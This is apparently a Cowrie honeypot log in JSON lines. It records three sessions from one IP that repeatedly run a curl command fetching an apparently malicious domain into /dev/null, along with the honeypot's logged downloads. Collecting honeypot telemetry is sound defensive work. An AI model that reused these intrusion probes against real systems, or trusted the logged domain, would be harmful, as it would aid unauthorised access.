{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:51.091755Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.092486Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.126414Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.128311Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.131931Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:51.132908Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.133430Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:51.135403Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.136278Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:51.163864Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.164553Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.172566Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.175049Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:51.176047Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.176694Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:51.178212Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.178912Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.181716Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.205695Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.207581Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.209680Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.211877Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:51.213180Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.213686Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:51.216525Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.217184Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:51.222554Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.223364Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:51.249593Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.250241Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.253886Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:51.255081Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.255551Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:51.259792Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.260346Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.264551Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.288412Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:51.289345Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.289838Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:51.292860Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.293577Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.296936Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:51.298819Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.299474Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.326725Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.328916Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:51.331954Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.332525Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:51.335610Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.336395Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:51.338970Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.339648Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.342471Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.370079Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:51.371157Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.371984Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:51.375885Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.377436Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.380579Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:51.382157Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.382870Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.419978Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.421876Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:51.422914Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.423541Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.426353Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.428745Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:51.431037Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.431774Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:51.433666Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.434379Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.486494Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.488361Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.491591Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:51.492803Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.493268Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:51.496730Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.497480Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.502052Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:51.505144Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
